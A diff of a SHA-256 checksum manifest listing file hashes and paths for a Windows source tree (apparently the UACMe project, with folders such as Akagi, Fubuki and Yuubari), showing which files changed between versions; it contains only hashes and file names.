+4da1fb2643bae679d681ef3ea94539a58177098ea36ba7cf7227ff48cff5ad2f *Source\Akagi\Resource.rc
d76f935faa2318354b976f83a30223e4fadcf8ae3df720577aafa5b2d5a7deaa *Source\Akagi\simda.c
450593a7d138e57b10200ecaeb1ac75ef0c8dd348f64b3a2e9e960740ca4a0fd *Source\Akagi\simda.h
-41af5a0b6ae9d510689410c183cb30537ec30084a32620d5734675ff780bdf5c *Source\Akagi\sirefef.h
+8ba2fdaba2d39c321b8d17974bafbb56554d7e049e4494c5a9bcd59765916d17 *Source\Akagi\sirefef.h
084bbb45cfae0af57bbef71b351a28c03e20ce7666c3e3e38d3ed3597bdccb1a *Source\Akagi\sup.c
b190b33893283d13de945bd0c63fd1f3e0f5df3c8f74e50daa29c3bbf57cac9b *Source\Akagi\sup.h
-ed49c508485eb1a372ddcd131aa688c969fa536f3845055e51b5611c2a792d49 *Source\Akagi\uacme.vcxproj
-fdb9f869c33fd8208c837548d3a827e20312249455c19f8cd34a01fd20e2cccd *Source\Akagi\uacme.vcxproj.filters
-eb362511262bd72ee14392aac1fd7c64f4be77d96b47797ac69dbadc873acc50 *Source\Akagi\uacme.vcxproj.user
-087f64ac18b054724e683d0ef92a885e19a8e1fe43405d71144ac9692b58e21a *Source\Akagi\bin\Fubuki32.cd
-dd5c530a8c5a7d80ed541cafa566ed2af664bac6ea558fbe0773378ecc837e85 *Source\Akagi\bin\Fubuki64.cd
-0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
-65ccadb5660c32cd9bfb6d27673b8ccea966ce383881b0fa71b260922c773fc6 *Source\Akagi\bin\Hibiki64.cd
-b062e2be5a17984dce931536ba80785bd95d8dc9a1bfc21c0b22315712f4bca7 *Source\Akagi\bin\Ikazuchi32.cd
-c650a5448056d708d21799617246ee47f9569afa5415e78f9be07d85055ead46 *Source\Akagi\bin\Ikazuchi64.cd
+8b47a94d19a8c883e95174faa880839c814501326db310c6c166697b0124314c *Source\Akagi\uacme.vcxproj
+05f28a23f92ed4dee4490ed547d06d49e90d521037711ec4d63382d83d868b4c *Source\Akagi\uacme.vcxproj.filters
+3b33eaab5cf41c023af5b51bf6348ecb6b6181b81b82d1ae4a577f84c7cc2069 *Source\Akagi\uacme.vcxproj.user
+d47ce8e2e94e6837f60ffe384e50d72c896e3325a49d45021787b3754f9eb6c7 *Source\Akagi\bin\Fubuki32.cd
+cf617d6472d2f81d11cfdf654c8ccccc3ef2d14bc5854e0deefdb53f72cefb47 *Source\Akagi\bin\Fubuki64.cd
+94ebfac14f977d4bd8a0e655eac290c49b20285d8fff32e33d668cce51580a1f *Source\Akagi\bin\Hibiki32.cd
+ec5e1b33a24f3278b1bc070333ed495909d7ded3d49156c97dda72131c01cbe0 *Source\Akagi\bin\Hibiki64.cd
+c61f3a9a959eb6bd2eaec276eff854d07f6f183d46588da5e68c0e8a009f5d1d *Source\Akagi\bin\Ikazuchi32.cd
+37cee2abfa1f8e3713e4b7282d8888c1d91fcbf517edd4c5d452942ab2c7057e *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
-28cc1e0994cc8fb7d87cc13d7bbc800480ddd1f5242f5050ff06e8d9d9767048 *Source\Fubuki\dll.vcxproj
+f49b43684d8b4bb77cbfc3a304951241d868259ece59af019fc375748dab72dd *Source\Akagi\tests\test.c
+dab6e990a8872a3c25f95e7ce2a8ad2da1f99167b563662bdad44e4e20b7c769 *Source\Akagi\tests\test.h
+e1a1592759e7f8f1f50e3f5b1ad55067ec30bcd44072f84a163f91956b72710d *Source\Fubuki\dll.vcxproj
d26d437c4410b29f2b428fde9f7a029b5c94429b7aa99f430b629479783e623f *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
-57aa4133d0328d2a44825ff4d8804f52518fdea6e83d9cca7b60c3777324be85 *Source\Fubuki\dllmain.c
+a4cf42b8c2ea71d8efa61e55b54a736c256d1cdd99f5774a15beec8b85327d68 *Source\Fubuki\dllmain.c
c424f02f0764802d4097e5bc8217f6cb777da82e1bc15f6c4d5e7a00174c2483 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
-b356eba53196c805864e2ac2fd5a4b38984a377698320c34dc70484de61f2adb *Source\Fubuki\version.rc
+0109acffa378156d44353a55d398f4f48bb51e4c59e268c8f3ffba6553f307ef *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
-7b5106df39693d85f43060cdc45b9405c7db3b9995f1fc8482bf602d33843dbf *Source\Hibiki\dllmain.c
-769a7bccff14fec330c1d36704fc0c4060c2700a3f53f4a6148cbe90bb796ca5 *Source\Hibiki\Hibiki.vcxproj
+47aed58ea27d928443197579dfa0c52718a3f6784464c9b1e7cd965d790e112b *Source\Hibiki\dllmain.c
+691f137f1ce6a476d1bc9d8cdc1c6b3ad977d888824ce1b9bed356e94ea4d8fb *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
-2445782239ea27dce10bca969eff59bb279b963b05c95e5b47d8634f86c0da03 *Source\Hibiki\version.rc
-3e987580133daa652cfb7639c83d852b004400a8beff5f6abf6ec0d0b824c29c *Source\Ikazuchi\dllmain.c
+4dfa74d554b7be0eb26c1d08232401bd33ffca0e5a619bcd209d4839425f7b3e *Source\Hibiki\version.rc
+e04bfbf94d1d78162e3960022f0b3583433354ef3a56d7b2786da35178af7c0a *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
-71808e6ef3af9c0fa3173d1c01aad2f4c2ed20024e6bd068631796949966f1fc *Source\Ikazuchi\Ikazuchi.vcxproj
+b34657273d28a94323579208865216135b219ec9d63a4ae15047a3fd529e7b95 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
+9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
-0b180f5168abbb6fa6754931ab3de21f0fdc964615a591a4154040a745a328b8 *Source\Ikazuchi\version.rc
-851c5fb0f9333d779542def40e124021fd84e1ab56075a5a0da64b33abe5f892 *Source\Inazuma\Inazuma.vcxproj
+c3191014030e36944c1e43d73369df8093cead1b1bf730975dc43abe9fb5ad87 *Source\Ikazuchi\version.rc
+82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
-602a920e9d044190055552068bf5e6cc97589988bf7294882e77b2b84fb0e380 *Source\Inazuma\main.c
+fc35222348ffb1c055cb1e8153d15d6c11667f5073ad2f9a821ee090ab8294b1 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
-9d5b86807c7ad8b954b4bc9ade511e57ccfc71854d228f48fb4bfd6ae9f2235f *Source\Naka\main.c
-4463b699dbad298e546848003f78308dc056267c6628f72485571f08da08826e *Source\Naka\Naka.vcxproj
+3aa5f39feacabfdbf5c82fcbf523514804cc15d1bcf54f1fc9464d53014efd05 *Source\Naka\main.c
+5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-db0e164fc1f567f1759603df36a0e44ebb728281fd1aa95977c3d575db58c34c *Source\Shared\ntos.h
+009c1782cdeb0bffa9fd98ea42d74e3f5a050ea159f4c78d8252eb86d60febf2 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c
@@ -103,13 +106,13 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Shared\_strncmpi.c
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\_strncpy.c
52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\Shared\_strstri.c
-f757bdc4baf67493591a14d11aef2adaa32690376fc34b698627aec63b156539 *Source\Yuubari\appinfo.c
+24432117a04e33dfb64e6defc8fcfc7f1298dde6bde8231d667bd9c9879e5755 *Source\Yuubari\appinfo.c
241814ee27790e05e3e3e3b0555720933175d3202855a9f2efff42b90496a1a1 *Source\Yuubari\appinfo.h
ffd6ad03b61ebb541f76c9ba105a916671f89c8220bf145b4d154943c94e85a9 *Source\Yuubari\basic.c
6cc92c6f21f4a9ad09c05f562404b195b8a7130bf512f39c4a6af6a46b97d6e0 *Source\Yuubari\basic.h
048c8865e9c699c0dbd328983fddefefba5c3bb9f1c0a146d7e4e42aa7dac2a1 *Source\Yuubari\comobj.c
9386b37510b8ea6c681d16b8a308d4e1fb0a030ed174cdd0899683a2e88d44ed *Source\Yuubari\comobj.h
-1fb49d3f7ab0acecdc247bf0d9154a5ec37b539d4db0ed4d6a620af6f5220ad1 *Source\Yuubari\consts.h
+9ddb6961b858c7841c00da8924f3daa705032305873c5ff24bdeab8f7a5be4df *Source\Yuubari\consts.h
a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari\cui.c
2d2891290f7780933347dcbd091bf0a17af6ee52257b5497951ff80567e03f88 *Source\Yuubari\cui.h
6916b415010caa7e0801ea515a722dbff8a3329ffa716977914f5b81a337d0c3 *Source\Yuubari\fusion.c
@@ -117,16 +120,16 @@ a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari
d8300b2b51d4f179dd2eaa453dafef6da331889a6bff97c281303cc980fc6a67 *Source\Yuubari\global.h
04bd5497fa817f15e3f6d63325c5e20172fde7f4c668d1dfdc35f99b228d3f33 *Source\Yuubari\logger.c
9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4 *Source\Yuubari\logger.h
-5bd341aff5d0c75429580da5c2f9ec28753e82e3770d5028e243922784738a62 *Source\Yuubari\main.c
-ac3026bf74108f833d3059411f4d21f1146f686329fd2c141cb4883cc1909ae7 *Source\Yuubari\patterns.h
+1fe4b833867d06e3b0d156f0990aa6e83938bcf62da460747286b06e069498a3 *Source\Yuubari\main.c
+321c200b9b4452270e4b66b23d004e421e2767949622ae9a9b3953c402b870e1 *Source\Yuubari\patterns.h
76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022 *Source\Yuubari\resource.h
-0e6bff106ee03caa9b94dca4542432e6c9d47d22e7f47ebf30a38b2c5bbc1b51 *Source\Yuubari\Resource.rc
+c598f46133f3f8d458b2b45ae9a4f77696403fcd0e4f1a740df161ca824943d5 *Source\Yuubari\Resource.rc
c90af8a79275833683c07bc639005a168ac194ea9203ad5c76c211008a1e8591 *Source\Yuubari\sup.c
80b0d3d17b61d83dd8dda02ce006acfa644d6ec51439454fb8a9485a353a07e5 *Source\Yuubari\sup.h
ab68c022e2fc5a8a3f6d5c1dcff00825ac9c533160983d33e93931573c02d85d *Source\Yuubari\wintrustex.h
d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e *Source\Yuubari\yuubari.ico
-1f39aa99875efc5db0e4e041657d3c6a9a9bb5de320c53f3a777cfcb29f4c643 *Source\Yuubari\Yuubari.vcxproj
+23b7bff5645fe2c5e928ba1807c561449148c16423d5b4c1d87caa20383f9504 *Source\Yuubari\Yuubari.vcxproj
a23fb5dccb937ee5103c59c6775f3017b97396d43f1399d1a2ada3ce9c8fd82f *Source\Yuubari\Yuubari.vcxproj.filters
86b904f9099ce583f13128e998a7d9f1f48682354b12c778a23615c361c44425 *Source\Yuubari\Yuubari.vcxproj.user
-3cf272ba16777722e4c9920655ee501ccfafa84538af835e6c3a3f972aa70a7c *Source\Yuubari\tests\test_fusion.c
+7b670598687782b8ef5ff7a95b54118dc5a4743a88c28100878e9855d6a2c250 *Source\Yuubari\tests\test_fusion.c
8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f *Source\Yuubari\tests\test_fusion.h